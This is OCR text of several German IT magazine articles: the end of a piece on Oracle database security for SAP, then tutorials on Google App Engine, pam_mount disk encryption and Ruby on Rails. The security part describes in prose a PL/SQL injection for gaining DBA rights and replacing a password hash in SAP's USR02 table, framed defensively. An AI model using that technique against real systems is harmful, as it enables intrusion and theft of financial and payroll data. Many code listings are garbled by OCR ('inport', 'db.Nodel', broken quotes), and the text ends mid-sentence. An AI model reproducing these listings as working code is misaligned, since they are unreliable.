hin rät SAP oft grundsätzlich davon ab, 
CPUs einzuspielen. Auch ein Wechsel 
auf die aktuelle Release, die bereits viele 
der älteren Schwachstellen behebt, ist 
nicht immer möglich. So hat SAP bei- 
spielsweise für 10g die aktuelle Release 
10.2.0.3 nicht zertifiziert. 

Unsere Erfahrungen spiegeln dies 
wider — Oracle-Datenbanken von SAP- 
Systemen sind in der Regel nicht auf 


[a] sapinfo 

[b] sidguess 

[e] Netzscanner nmap 

[d] oat-Suite 

[e] Oracles Security Checklist 


service.sap.com 

www.red-database-security.com/ 

nmap.org/ 

www.cqure.net/ 
www.oracle.com/technology/deploy/security/pdf/ 


twp_security_checklist_db_database.pdf 


[f] Authentifizierung durchs Betriebssystem 


help.sap.com/saphelp_nwO4/helpdata/en/ed/ 


18cc38e6df4741ua264bddcd4f98ae2/frameset.him 


[gl] SQL-Injektion in Oracle 


www.red-database-security.com/advisory/ 


oracle_sql_injection_dbms_cdc_impdp2.html 


[h] Frank Dittrich, SAP-Passwort-Sicherheit 
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www.itaudit.de/assets/artikel/eigen/SAP-Passwort.pdf 


einem aktuellen Patch-Stand. Listing 3 
zeigt, wie der Benutzer Scott durch eine 
PL/SQL-Injection-Schwachstelle in der 
Prozedur dbms_cdc_impdp.bump_se- 
quence Rechte eines DBA erhält [g]. 

Bei einem ausreichend geschützten 
Remote-Zugriff ist das Risiko durch lo- 
kale Schwachstellen gering, da auf der 
Datenbank selbst nur der SAP- und ad- 
ministrative Benutzer aktiv sind. An- 
ders ist dies jedoch mit Schwachstellen, 
die sich aus dem Netz ausnutzen lassen. 
Zum Schutz sollten nicht verwendete 
Dienste, etwa der zum TNS-Listener 
gehörende extproc oder die XML-Da- 
tenbank, abgeschaltet werden. Beide 
enthielten bereits Schwachstellen, die 
sich von entfernten Rechnern ausnut- 
zen ließen. Zudem benötigt ein SAP- 
System sie in der Regel nicht. 

Mit einem Datenbankbenutzer, der 
das SAP-Schema lesen darf, lassen sich 
alle in SAP gespeicherten Informationen 
wie Finanz- und Gehaltsdaten oder 
Stücklisten auslesen. Das Schreiben in 
der Datenbank ist grundsätzlich auch 
möglich. Aufgrund der zahlreichen Ab- 
hängigkeiten lässt sich das SAP-System 
dadurch jedoch leicht in einen inkonsis- 
tenten Zustand bringen. Denkbar wäre 
aber, in der Tabelle USRO2 für einen 
Anwender mit umfassenden Rechten 
den Passwort-Hash zu ändern, sodass 
der Angreifer dessen Passwort kennt [h]. 


Fazit 


Grundsätzlich ist es möglich, Oracle-Da- 
tenbanken für SAP-Systeme effektiv 
zu schützen. Abhängig von Randbe- 
dingungen, beispielsweise der Netz- 
topologie des Unternehmens sowie den 
regulatorischen und gesetzlichen Rah- 
menbedingungen, muss man jedoch 
vorbeugende und aufdeckende Maß- 
nahmen sorgfältig aufeinander und auf 
das Umfeld abstimmen. In vielen Unter- 
nehmen besteht in dieser Hinsicht noch 
Handlungsbedarf. (ck) 
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Webanwendungen 


Eigene Projekte mit Googles App Engine 


Spielplatz 


Markus Stäuble 


Mit seiner großen 


Schar von Entwicklern ist Google immer 


wieder für Überraschungen gut. Eine der Jüngsten, die 
Google App Engine, erlaubt es dem Entwickler, Anwendungen 
auf der Infrastruktur von Google laufen zu lassen. Was der 
Dienst zu bieten hat, soll eine erste Anwendung zeigen. 


nächst als Preview — Entwicklern 

an, die bewährte Server-Infrastruk- 
tur der hauseigenen Suchmaschine für 
eigene Projekte zu verwenden. Über ein 
Web-Interface kann der Programmierer 
in der sogenannten Google App Engine 
ein Projekt anlegen und seine Anwen- 
dung hochladen. Sie kommuniziert über 
eine definierte Schnittstelle (API) mit 
der App Engine, die grundlegende Auf- 
gaben wie Datenhaltung und Skalierung 
übernimmt. Jeder Anwendung stellt die 
App Engine 500 MByte physikali- 
schen Speicher zur Verfügung, außer- 
dem Übertragungskapazität für monat- 
lich fünf Millionen Seitenabrufe. 

Als Grundlage für Anwendungen 
stellt Google das „App Engine Software 
Development Kit“ bereit (siehe Kasten 
„Onlinequellen“). Da es in Python ge- 
schrieben ist, ist auch der Entwickler 
zunächst auf die — immerhin recht 
mächtige - Skriptsprache festgelegt. 

Das SDK enthält eine Reihe von 
Schnittstellen. Über die Datastore-API 
kann die Anwendung auf den transak- 
tionalen Datenspeicher zugreifen, den 
die App Engine bereitstellt. Dabei muss 
sie Anfragen in der an SQL angelehnten 


& eit April 2008 bietet Google — zu- 
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Google Query Language (GQL) formu- 
lieren. Funktionen zum Manipulieren 
von Grafiken, etwa Vergrößern oder 
Rotieren, steuert die Images-API bei. 
Mithilfe der Memcache-API, die einen 
verteilten Cache zur Verfügung stellt, 
lassen sich häufig genutzte Daten im 
schnelleren Hauptspeicher halten. 

Mit der Außenwelt kann das Pro- 
gramm auf unterschiedlichen Wegen 
kommunizieren. Die Mail-API etwa er- 
laubt es, E-Mails zu verschicken. Will 
der Programmierer über HTTP auf an- 
dere Anwendungen im Web zugreifen, 
kann er die URL-Fetch-API verwenden. 
Über die Users-API lassen sich An- 
wender mit einem vorhandenen Google- 
Nutzerkonto authentifizieren. Außerdem 
hat Google Version 0.96.1 des Web Ap- 
plication Framework Django ins SDK 
integriert. 

Neben dem Zugriff auf die Funktio- 
nen der App Engine bietet das SDK ei- 
ne Laufzeitumgebung, mit der sich die 
Anwendung lokal — auf dem Entwick- 
lungssystem - testen lässt. Dadurch ver- 
kürzt sich die Entwicklungszeit. 

Aus Sicherheits- und Effizienzgrün- 
den laufen die Anwendungen auf Goo- 
gles Servern in einer geschützten Um- 


gebung (Sandbox), die das Programm 
von der darunterliegenden Hardware 
isoliert. Dadurch sind dem Entwickler 
Grenzen gesteckt. Zugriffe auf Fremd- 
systeme etwa sind nur über die zur Ver- 
fügung gestellten Schnittstellen (URL- 
Fetch-API, Mail-API) gestattet. Eigene 
Dienste kann die Anwendung nur per 
HTTP(S) auf den Standardports 80 und 
443 anbieten. 


Entwicklung 
im Sandkasten 


Applikationen haben keinen direkten 
Zugriff auf das darunterliegende Datei- 
system. Nur Dateien, die die Anwen- 
dung persönlich über HTTP entgegen- 
genommen hat, kann sie auch lesen. 
Um die Daten dauerhaft zu speichern, 
muss sie die Datastore-API verwenden. 
Das Starten eigener Prozesse ist eben- 
falls verboten. Aktionen lassen sich nur 
als Antwort auf eine Anfrage ausfüh- 
ren, und die Reaktion muss innerhalb 
einiger Sekunden erfolgen. 

Installationspakete stellt Google für 
Linux, Mac OS X und Windows bereit. 
Wer damit experimentieren möchte, be- 
nötigt jedoch zunächst einen Python- 
Interpreter, Version 2.5 oder jünger. 
Neuere Linux-Distributionen bringen ihn 
meist mit, Windows-Nutzer finden eine 
MSI-Datei auf der Python-Homepage. 

Für eine eigene Anwendung muss 
der Entwickler zunächst eine Konfigu- 
rationsdatei anlegen, am besten in ei- 
nem neuen Verzeichnis. Als Sprache hat 
Google dafür das syntaktisch anspruchs- 
lose YAML gewählt — das rekursive 
Akronym steht für „YAML Ain’t Mark- 
up Language“. 

Listing 1 zeigt die Konfigurations- 
datei — üblicherweise trägt sie den Na- 
men app.yaml — für ein einfaches Bei- 
spielprogramm. Unter application und 
version muss der Programmierer den 
Namen seiner Anwendung und ihre 
Versionsnummer eintragen. runtime 
und api_version geben die verwendete 
Programmiersprache und API-Version 
an — haben zurzeit also immer die Wer- 
te python und 1. Unter handlers schließ- 
lich kann man festlegen, wie die App 
Engine mit unterschiedlichen Anfragen 
umgeht: static_files und static_dir lie- 
fern unveränderliche Dateien wie Style- 
sheets oder Bilder aus, script hingegen 
reicht die Anfrage an das genannte Py- 
thon-Skript weiter. 

Handlern für statische Dateien lässt 
sich mit expiration explizit die Verweil- 
zeit im Cache des Browsers mitgeben. 
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Fehlt die Angabe, greift der Standard- 
wert. Den kann der Programmierer zum 
Beispiel mit default_expiration: „2d4h“ 
einstellen. Gibt man keinen Wert an, 
handelt der Browser nach eigenem Er- 
messen — was nicht immer erwünscht ist. 


Zugriffsrechte einstellbar 


Außerdem kann der Entwickler für je- 
den Handler separat festlegen, ob sich 
Nutzer der Anwendung authentifizieren 
müssen. login: required schaltet die 
Passwort-Abfrage ein, login: admin 
verlangt darüber hinaus, dass sich der 
Klient als Administrator ausweist. 

Statischer Inhalt lässt sich mit sta- 
tic_files und static_dir wahlweise da- 
tei- oder verzeichnisweise freigeben. 
Verwendet der Programmierer Letzte- 
res, kann er mit skip_files einzelne Da- 
teien ausschließen. 

Mit einer zweiten Konfigurationsda- 
tei, index.yaml, kann der Entwickler die 
Indexierung des Datenspeichers beein- 
flussen. Beim Erstellen hilft das SDK: 
Läuft die Anwendung in der lokalen 
Entwicklungsumgebung, erstellt es die 
Datei automatisch, falls eine Abfrage 
einen Index benötigt. Der Programmie- 
rer kann die Einträge nachträglich än- 
dern. Fügt er am Ende der Datei die 
Zeile # AUTOGENERATED an, blei- 
ben die editierten Einträge bei späteren 
Programmläufen unverändert. 

Anwendungen bestehen in der Re- 
gel aus zwei Teilen: dem Layout und 
der sich dahinter verbergenden Funk- 
tion. Googles App Engine erlaubt es, 
beide voneinander zu trennen. Dazu 
erstellt man das Seitenlayout in HTML 
und greift mit einer speziellen Syntax 
(doppelte geschweifte Klammer) direkt 
auf Daten und Objekte zu. Der Link 
<a href="{{ url }}"> etwa verwendet 
den Wert von url als Adresse. 

Eigene Request-Handler kann man 
von von der vordefinierten Klasse Re- 
questHandler aus google .appengine.ext. 
webapp ableiten. Für einfache Anwen- 


App Engine SDK code.google.com/ 


appengine/downloads.himl 
Entwickler- 


Registrierung appengine.google.com 


Django www.diangoproject.com 
Django Data www.diangoproject.com/ 
Modeling API documentation/model-api/ 
Python www.python.org 
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dungen genügt es, die Methode ger der 
eigenen Subklasse zu implementieren. 

Eine Template Engine stellt die Ver- 
bindung zwischen HTML-Seite und 
Anwendungslogik her. Davon existie- 
ren etliche; innerhalb der App Engine 
bietet sich die von Django an. Der 
Handler muss nach getaner Arbeit die 
Template Engine aufrufen und als Pa- 
rameter den Namen der HTML-Datei 
sowie eine Liste von Werten übergeben 
(siehe Listing 2). 

Benötigt die Anwendung Daten aus 
dem persistenten Speicher, muss sie sie 
per GQL abrufen, etwa mit db.GqlOue- 
ry("Select * from Greeting"). Das Er- 
gebnis ist eine Liste von Instanzen des 
gesuchten Typs. 

Die Schnittstelle für den Datenzu- 
griff entspricht der Data Modeling API 
von Django. Will der Entwickler Daten 
persistent ablegen, muss er seine eige- 
nen Klassen von google.appengine. 
ext.db.Model ableiten. Mit der Metho- 
de put lassen sich die Daten einer In- 
stanz speichern. 


Lokale Entwicklungshilfe 


Mit dem Skript dev_appserver.py <ver- 
zeichnis> startet der Programmierer den 
Entwicklungsserver des SDK. Als Ar- 
gument muss er den Namen des Ver- 
zeichnisses übergeben, in dem die Da- 
tei app.yaml liegt. Zusätzlich kann er 
mit der Option --clear_datastore den 
lokalen Datenspeicher säubern. 

Unter localhost:8080/_ahladmin stellt 
der Server eine Konsole zur Verfü- 
gung. Sie enthält den sogenannten Da- 
tastore Viewer, über den der Nutzer 
Daten eingeben, ändern oder löschen 
kann. Ein Python-Interpreter erlaubt es 
außerdem, Code innerhalb der Anwen- 
dungsumgebung auszuführen. 

Hat die Anwendung alle Tests bestan- 
den, kann man sie auf Googles Server 
hochladen - sofern man sich erfolgreich 
registriert hat: In der Preview-Phase sind 
die Accounts noch begrenzt. Außerdem 
kann jeder Entwickler nur maximal drei 
Anwendungen betreiben. 

Das Kommando appcfg.py update 
<verzeichnis> überträgt die Anwen- 
dung im angegebenen Verzeichnis auf 
den Server. Anschließend ist sie im Web 
unter <name>.appspot.com zugänglich. 
Daher muss der Programmierer einen 
eindeutigen Namen wählen und vor dem 
Upload in app.yaml eintragen. Will er 
sein Werk später wieder löschen, kann 
er alle Handler aus app.yaml entfernen 
und durch einen neuen ersetzen, der auf 


Listing 1: YAML-Konfigurations- 
datei für eine einfache Anwendung 


application: helloworld 
version: 1 
runtime: python 
api_version: 1 
handlers: 
- url: Tess 
statie_dir: css 
- url: /images 
static_dir: images 
- url: Ir 
script: helloworld.py 


Listing 2: Request Handler für die 
Klasse Greefing 


from google.appengine.ext.webapp inport template 
from google.appengine.ext import db 
from google.appengine.api import users 
from google.appengine.ext inport webapp 
class Greeting(db.Nodel): 
author = db.UserProperty() 
content = db.StringProperty(multiline=True) 
date = db.DateTimeProperty(auto_now_add=True) 
class MainPage(webapp.RequestHandler): 
def get(self): 
greetings_query = Greeting.all().order('-date') 
greetings = greetings_query.fetch(10) 
page = "Login.html! 
if users.get_eurrent_user(): 
url = users. create_logout_url(self.request.uri) 
url_linktext = "Logout! 
page = "index. html! 
else: 
url = users. create_login_url(self.request.uri) 
url_linktext = "Login! 
tenplate_values = { 
'greetings': greetings, 
'url!z url, 
SAINSUS url_linktext, 


path = os.path.join(os.path.dirnane(_file_), page) 
self.response.out.urite(template.render(path, 
tenplate_values)) 


eine nicht existierende Datei verweist. 
Nach einem erneuten Upload ist die An- 
wendung deaktiviert. 


Fazit 


Für eigene Projekte die Infrastruktur von 
Google verwenden zu können, ist sicher- 
lich für viele Entwickler interessant. 
Dass das Unternehmen den neuen Dienst 
zunächst im kleinen Kreis testet — wie 
zuvor Google Mail -, versteht sich von 
selbst. Unangenehmer wirkt sich hinge- 
gen die Beschränkung auf Python aus — 
vor allem für die Fans anderer Sprachen. 
Der Parameter runtime in der Konfigu- 
rationsdatei lässt jedoch vermuten, dass 
diese Barriere früher oder später fällt. 
Ob die App Engine sich auch für 
„großformatige“ Anwendungen eignet, 
muss sich zeigen. Dabei könnte sich 
die schützende Sandbox als Hindernis 
erweisen. Es ist an Google, dem Ent- 
wickler genug Funktionen zu bieten, 
dass er den Sandkasten nicht als Käfig 
empfindet. (mr) 


MARKUS STÄUBIE 


ist CTO bei der Namics (Deutschland) 
GmbH. 
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Verschlüsselung 


DA Bequemer Umgang mit Kryptodateisystemen 


Passepartout 


Stefan Schulze Frielinghaus 


Moderne Linux-Distributionen verfügen über alle Werkzeuge 
für den Umgang mit verschlüsselten Partitionen. Will man aber 
Daten nur während einer laufenden Sitzung entschlüsseln, war 


rypto-Dateisysteme unter Linux 
K gibt es schon lange. Gerade Note- 

book-Besitzer verschlüsseln oft 
die Heimatverzeichnisse der jeweili- 
gen Benutzer, um beispielsweise bei 
einem Diebstahl des Geräts nicht gleich 
alle Daten preiszugeben. Hierfür ver- 
schlüsseln sie oft die komplette /home- 
Partition oder nur das Verzeichnis des 
jeweiligen Benutzers. Debian hat mit 
/etc/crypttab eine neue Konfigurations- 
datei speziell für verschlüsselte Parti- 
tionen eingeführt. Mit dieser kann das 
Init-System die entsprechende Partition 
vorbereiten (zum Beispiel eine Pass- 
wortabfrage während des Bootens), so- 
dass sich diese später ins System ein- 
binden lässt. Dies bedeutet aber, dass 
der Benutzer zweimal ein Passwort ein- 
geben muss, je einmal zur Entschlüs- 
selung der Partition und zum Login. 
Außerdem steht die entschlüsselte Par- 
tition die gesamte Zeit allen Benutzern 
des Sytems zur Verfügung. 


Sicherheit mit 
Komfort kombiniert 


Schöner wäre es, wenn die betreffende 
Partition nur dann entschlüsselt und 
eingebunden würde, wenn der Benutzer 
sich am System anmeldet, wie dies bei- 
spielsweise bei MAC OS X der Fall ist. 
Genau hier kommt pam_mount zum 
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bislang Handarbeit angesagt. pam_mount verspricht hier 


deutlich mehr Komfort. 


Einsatz (pam-mount.sourceforge.net). 
Über diese Erweiterung für PAM (Plug- 
gable Authentification Modules) lässt 
sich eine Partition — via Loopback- 
Mount sogar eine Image-Datei — ent- 
schlüsseln und einbinden, sobald sich 
der Benutzer am System anmeldet. Das 
anfänglich nur für Linux geschriebene 
PAM-Modul unterstützt mittlerweile 
die gängigsten BSD-Systeme. Auch ein 
Binärpaket liegt den meisten Distribu- 
tionen bei: unter Fedora heißt das Pa- 
ket beispielsweise pam_mount, unter 
Debian und verwandten Distributionen 
libpam-mount. 

Nach erfolgreicher Installation muss 
man die Konfigurationsdatei /etc/secu- 
rityI/pam_mount.confxml anpassen. Fol- 
gende Zeile würde eine per cryptsetup 
verschlüsselte Partition (/dev/hda35) ein- 
binden, sobald sich der Benutzer foo 
am System anmeldet. 


<volume fstype="crypt" path="/dev/hdaS" 7 
mountpoint="/home/foo" /> 


Fedora 7 und 8 verwenden pam_mount 
in der Version 0.18, die noch keine 
XML-Konfiguration unterstützt. Der 
Eintrag für eine verschlüsselte Parti- 
tion ähnelt jedoch stark der XML-Va- 
riante: 


volume foo crypt - /dev/hda5 /home/foo - -- 


Natürlich setzt dies voraus, dass die 
Passwörter zum Login und zum Ent- 
schlüsseln der Partition identisch sind. 
Gegebenenfalls muss man via cryptset- 
up luksAddKey <device> mit dem ge- 
wünschten Passwort einen weiteren 
Key-Slot zur Entschlüsselung der Par- 
tition anlegen. 


Mit der Option loop lässt sich an- 
stelle einer Partition auch eine ver- 
schlüsselte Image-Datei verwenden. 
So bindet 


<volume fstype="crypt" path="/home/bar.crypt" 7 
mountpoint="/home/bar" options="loop" /> 


beim Anmelden anstelle einer Partition 
das via path referenzierte Krypto-Image 
ein. 


Vermeidung von 


Doppelabfragen 


Allerdings ist dies nur die Konfigura- 
tion von pam_mount. Damit das Sys- 
tem das Tool auch benutzt, muss man 
die PAM-Konfiguration ergänzen. Die 
Dateien befinden sich in /etc/pam.d/. 
Nur falls das fehlt, greift PAM auf die 
vormals verwendete Konfigurationsda- 
tei /etc/pam.conf zurück. Die Dateien 
login für Konsolen- und Shell-Logins 
sowie gdm respektive kdm für die grafi- 
sche Anmeldung muss man um folgen- 
de zwei Zeilen ergänzen: 


auth optional pam_mount.so 
session optional pam_mount.so 


Nach diesen Änderungen hängt das 
PAM-Subsystem die verschlüsselte 
Partition nach jedem korrekten Login 
ein und entfernt sie nach jedem Abmel- 
den aus dem System wieder. Letzteres 
klappt allerdings nicht, wenn nach dem 
Logout noch aktive Prozesse des Be- 
nutzers auf Dateien in seinem Heimat- 
verzeichnis zugreifen, da für das Aus- 
hängen umount zum Einsatz kommt. 
Leider ist dies bei großen Desktop- 
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Umgebungen wie Gnome oder KDE 
recht oft der Fall. Allerdings haben die 
Entwickler dies erkannt und stellen das 
Verhalten hoffentlich in nicht allzu fer- 
ner Zukunft ab. 

Falls das System bei einem Login 
zweimal das Passwort abfragt, liegt 
das daran, dass es die pam_mount- 
Module „zu spät“ aktiviert. Das PAM- 
Subsystem arbeitet die Module wie 
auf einem Stack liegend der Reihe 
nach ab. Falls es also das für die Sys- 
temauthentifizierung (system-auth) vor 
pam_mount aktiviert, muss Letzteres 
nochmals nach dem Passwort fragen. 
Allerdings ist dieses Verhalten nur 
sinnvoll, wenn sich die Passwörter 
zum Einloggen und zum Entschlüsseln 
der Partition unterscheiden. Ist das nicht 
der Fall, setzt man zum Vermeiden ei- 
ner mehrfachen Abfrage die Zeile auth 
optional pam_mount.so in der jeweili- 
gen Konfigurationsdatei ganz nach oben 
oder zumindest vor das Systemauthen- 
tifizierungsmodul (auth include sys- 
tem-auth). 

Unter dem aktuellen Fedora 9 klappt 
das grafische Login via GDM reibungs- 
los. Eine Anmeldung an der Konsole 


hingegen terminiert SELinux wegen 
fehlender Rechte für den login-Prozess. 
Ein Patch, der dieses Verhalten kor- 
rigiert, ist an die Entwickler unter- 
wegs. Er soll in die SELinux-Policy- 
Update-Version 3.3.1-75 einfließen, 
die mit Erscheinen dieser Ausgabe ver- 
fügbar sein sollte. Bis dahin kann man 
sich mit einer Policy mit folgendem 
Eintrag behelfen: 


auth_manage_pam_pid(local_login_t) 


Hinweise, wie sich die modulare SELi- 
nux-Policy anpassen und erweitern lässt, 
liefert der dritte Teil des SELinux-Tu- 
torials [1]. 

Abschließend soll nicht unerwähnt 
bleiben, dass pam_mount nicht nur ver- 
schlüsselte Partitionen einbinden kann, 
sondern alle von mount unterstützten. 
So lassen sich beispielsweise entfernte 
Freigaben über SMB/CIFS oder NFS 
einbinden; Details hierzu liefert die 
Manpage. Außerdem kann jeder Be- 
nutzer in seinem Heimatverzeichnis 
eine Konfigurationsdatei mit weiteren 
Mountpoints anlegen. Da dies aber ein 
potenzielles Sicherheitsrisiko darstellt, 
schaltet die Default-Einstellung der 


globalen pam_mount-Konfiguration die- 
ses Feature standardmäßig ab. 


Fazit 


Wer sein Heimatverzeichnis vor neu- 
gierigen Blicken schützen möchte, kann 
dies mit pam_mount einfach und ele- 
gant bewerkstelligen. Allerdings ist bei 
den aktuellen Desktop-Umgebungen 
nach dem Ausloggen meist noch Hand- 
arbeit erforderlich. (avr) 


STEFAN SCHULZE FRIELINGHAUS 


studiert Informatik; seine Interessen- 
gebiete sind Compiler, Betriebssysteme 
und Sicherheit in der IT. 
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[1] Thorsten Scherf; SELinux- 
Tutorial II; Teile und konfiguriere; 
Modulare Policy vereinfacht 
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Ruby on Rails 


Rails-Tutorial Ill: Sessions, Testen, Debugging 


Edel seı der Stein 


Denny Carl 


Mit Rails entwickelte Webanwendungen sind unter anderem 
wegen vieler vorhandener Plug-ins oder der in Rails 
implementierten Javascript-Bibliothek Prototype oft leicht 
erweiterbar. Etwa um Session-Handling und Ajaxifizierung 


sowie Testen und Debugging. 


it Ruby on Rails lassen sich mo- 
M derne Webapplikationen schnell 
und effizient entwickeln. Dieser 
letzte Teil des Tutorials stellt weitere 
Features des Framework vor, die zeigen, 
warum Rails Maßstäbe gesetzt hat. Bis- 
lang können Nutzer in der Beispielan- 
wendung Trainspotr Zugsichtungen an- 
legen, Fotos hochladen und den Ort der 
Aufnahme über eine Google Map ver- 
anschaulichen. Die Plattform verfügt 
zudem über einen passwortgeschützten 
Benutzerbereich. Eine Navigationsregion 
erleichtert das Ansteuern einzelner Funk- 
tionen von Trainspotr. 
Nun stehen weitere Schritte im Funk- 
tionsumfang an. Am Anfang steht das 
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Speichern von Ruby-Objekten in einer 
Session. Bei der Implementierung einer 
Bewertungsfunktion für Zugsichtungen 
kommt Ajax zum Einsatz. Hier geht es 
darum, wie einfach asynchroner Daten- 
austausch mit dem Server in Rails nutz- 
bar ist und wie nahtlos die Macher von 
Rails die Ajax-Bibliothek Prototype ins 
Framework integriert haben. Ferner soll 
die Startseite aus dem Datenbestand von 
Trainspotr schöpfen und unterschied- 
liche Listen von Zugsichtungen anzei- 
gen. Das Testen und Veröffentlichen 
von Rails-Anwendungen beschließen 
dieses Tutorial. 

Zunächst soll die Navigation der Seite 
eine Überarbeitung erfahren. Derzeit 


prüft die durch before_filter ausgeführte 
Methode ApplicationController#authen- 
ticate die Zugangsberechtigung bei be- 
stimmten Actions des TrainspotsCon- 
troller, fragt den Login-Namen und das 
Passwort ab und gleicht sie mit dem 
Model User und der damit in Verbin- 
dung stehenden Datenbanktabelle ab. 
Das Ergebnis, im Erfolgsfall eine In- 
stanz des User-Model, speichert das 
Programm in der Instanzvariable @cur- 
rent_user. Durch deren Untersuchung 
ermitteln Controller unter anderem, ob 
derzeit ein Nutzer eingeloggt ist. Bei 
TrainspotsController#show etwa, einer 
Action, die nicht zugangsbeschränkt sein 
soll, entsteht auf diese Weise ein Stolper- 
stein. Denn selbst ohne Authentifizie- 
rung ist die Frage, ob ein Nutzer einge- 
loggt ist, wichtig für die Anzeige des 
Navigationsmenüs und der dort sicht- 
baren Links. Da ApplicationController# 
authenticate hier jedoch nicht zur Aus- 
führung kommen muss und @current_ 
user somit nicht ermittelt, erweckt das 
Navigationsmenü den Eindruck, dass 
der Nutzer nicht eingeloggt ist. 


Daten in einer 
Session speichern 


Über die Nutzung von Sessions kann 
Rails einen einmal ausgeführten Log- 
in-Vorgang dauerhaft erkennen und 
abfragen, sogar bei Actions, die keine 
Authentifizierung verlangen. Die User- 
Instanz lässt sich beispielsweise als Ses- 
sion-Wert beim Login speichern. Rails 
stellt ein Hash-ähnliches Objekt zur 
Verfügung, mit dessen Hilfe Werte in 
die Session geschrieben und aus ihr ge- 
lesen werden können. Ganze Ruby-Ob- 
jekte können Anwendungen so festhal- 
ten, da die einzelnen Eigenschaften 
automatisch serialisiert werden. 

Beim Login wird die User-Instanz 
somit nicht an @current_user, sondern 
an session|:current_user] weitergege- 
ben. Eine Hilfsmethode wie Applica- 
tionController#current_user kann den 
Zugriff auf den Session-Wert erleich- 
tern (siehe Listing 1). 

Die Methode current_user steht nun 
in allen Controllern, die von Applica- 
tionController erben, zur Verfügung. 
In den View-Templates im Gegensatz 
zur nun abgelösten Instanzvariablen 
@current_user allerdings nicht. Es sei 
denn, die Methode ist als Helper dekla- 
riert, was man durch die Platzierung 
von helper_method :current_user am 
Start des Klassenkörpers ganz einfach 
erledigen kann. 
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In TrainspotsController, PhotosCon- 
troller und im Navigationspartial muss 
nun @current_user durch current_user 
ersetzt werden. Das bewirkt, dass man 
stets ermitteln kann, ob und welcher 
User angemeldet ist. 


Einzelne Bewertungen 
anzeigen 


Die Website soll Surfern anbieten, die 
Zugsichtungen anderer Nutzer zu be- 
werten. Dazu sollen sie eine Punktzahl 
zwischen 1 und 5 vergeben können. 
Für diese Funktion stehen ebenfalls 
mehrere Plug-ins zur Verfügung, die 
der Rails-Community entstammen. Im 
vorliegenden Fall kommt acts_as_ra- 
ted zum Einsatz. Es beinhaltet sämtli- 
che Funktionen zum Model-basierten 
Aufnehmen und Auswerten von Be- 
wertungen. Darunter ist eine Funktion, 
die überprüft, ob ein Benutzer schon 
eine Bewertung für eine bestimmte 
Zugsichtung abgegeben hat. Das Plug- 
in erweitert ein Model um diverse Me- 
thoden und fügt der damit verbunde- 
nen Datenbanktabelle neue Spalten 
hinzu, die die ausgewerteten Daten ei- 
ner weiteren durch das Plug-in ange- 
legten Datenbanktabelle speichern sol- 
len. Im Terminal kann man das 
Plug-in per 
script/plugin install svn://rubyforge.org/var/ 7 
svn/acts-as-rated/trunk/acts_as_rated 


installieren. Anschließend füge man 
dem Model, dessen Instanzen zu bewer- 
ten sind, die Zeile acts_as_rated hinzu 
— hier Trainspot in app/models/train 
spot.rb. Idealerweise steht die Zeile am 
Anfang des Klassenkörpers. 

Nun muss die Datenbanktabelle des 
Model um die von acts_as_rated benö- 
tigten Felder erweitert werden, zudem 
ist das Anlegen einer neuen Tabelle nö- 
tig. Dies kann über eine Migration er- 
folgen. Mit dem generate-Skript der 
Rails-Anwendung können Entwickler 
das Grundgerüst der Migration und ei- 
ne entsprechende Datei erzeugen: 


ruby script/generate migration 7 
AddRatingToTrainspot 


In diesem Fall wird darauf verzichtet, 
bei der Generierung eine Liste der ge- 
wünschten Felder anzugeben, denn 
acts_as_rated bietet dafür Hilfsmetho- 
den, die es nun in db/migrate/006_add_ 
rating_to_trainspot.rb zu notieren gilt. 
Methoden, die die dabei nötigen Schrit- 
te zurücknehmen, stehen ebenfalls zur 
Verfügung (Listing 2). 
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Ein rake db:migrate im Terminal 
führt die Änderungen an der Datenbank 
ein weiteres Mal durch. Schon bestehen- 
de Datensätze in der Tabelle trainspots 
sind nun anzupassen. Konkret bedeutet 
dies, dass die neu hinzugekommenen 
Felder rating_count, rating_avg und ra- 
ting_total jeweils den Wert O erhalten. 
Alternativ kann man bestehende Daten- 
sätze löschen und neu anlegen. 

Damit sind alle Schritte zum Spei- 
chern von Bewertungen erledigt. Nun 
ist es erforderlich, die Benutzeroberflä- 
che um das Anzeigen von Bewertun- 
gen und um eine Option zum Abgeben 
von Bewertungen zu erweitern. Dazu 
dient die Action TrainspotsControl- 
ler#show. 

Unterhalb der im View enthaltenen 
Google-Map kann ein Abschnitt für die 
Bewertung der Zugsichtung eingerich- 
tet werden. Zunächst soll es um die An- 
zeige gehen. 


<p><b>Bewertung</b><br /> 
<div id="rating"> 

<%= show_rating[@trainspot) %> 
</div> 


Bei show_rating handelt es sich um ei- 
ne noch zu implementierende Helper- 
Methode. Es ist sinnvoll, sie als Helper 
— oder Partial — anzulegen, denn im 
weiteren Verlauf soll es die Option ge- 
ben, eine Bewertung per Ajax an den 
Server zu schicken, was erfordert, die 
Anzeige der momentanen Bewertung 
auf der Website anschließend zu aktua- 
lisieren. Hierbei wird show_rating ein- 
fach ein zweites Mal aufgerufen. 
Helper für die Views des Trainspots- 
Controller sind in app/helpers/train- 
spots_helpers.rb zu speichern. acts_ 
as_rated hat das Model Trainspot um 
die Methode rating_count erweitert. 
Dadurch kann man herauszufinden, ob 
schon eine Bewertung für die Model- 


A-TRACT 


@ Prototype, eine für Rails entwickelte 
Javascript-Bibliothek, erleichtert 
die Ajaxifizierung von Webanwen- 
dungen. 


© Per Session-Handling und mit 
dem Plug-in acts_as_rated prüft 
die Anwendung Trainspotr, ob ein 
Nutzer ein Foto schon bewertet hat. 


@ Uhnit-Testing und das Vorgehen bei 
der Veröffentlichung einer Anwen- 
dung schließen das Tutorial ab. 


Listing 1: Session-Handling 


def current_user 
sessionlzcurrent_user] 

end 

protected 

def authenticate 
authenticate_or_request_with_http_basic do |Login, password] 

sessionlzcurrent_user] = User.authenticate(login, password) 

end 

end 


Listing 2: Rating hinzufügen 


class AddRatingToTrainspot < ActiveRecord::Migration 
def self.up 
ActiveRecord::Base.create_ratings_table 
Trainspot.add_ratings_columns 
end 
def self.down 
Trainspot.remove_ratings_columns 
ActiveRecord::Base.drop_ratings_table 
end 
end 


Listing 3: Rating anzeigen 


def show_rating(trainspot) 
if trainspot.rating_count > 0 
return trainspot.rating_average.to_s + " / 5 Punkten" 
else 
return "Keine Bewertung vorhanden" 
end 


Instanz vorhanden ist. Die ebenfalls neu 
hinzugekommene Methode rating_ 
average zeigt die momentane Durch- 
schnittspunktzahl und damit den Wert, 
der die Wertschätzung der Nutzer für ei- 
ne Zugsichtung ausdrücken soll (siehe 
Listing 3). Zu berücksichtigen ist, dass 
der Rückgabewert des Helper direkt in 
den aufrufenden View gesetzt wird. 


Bewertung einer 
Sichtung abgeben 


Die Abgabe einer Wertung soll eine 
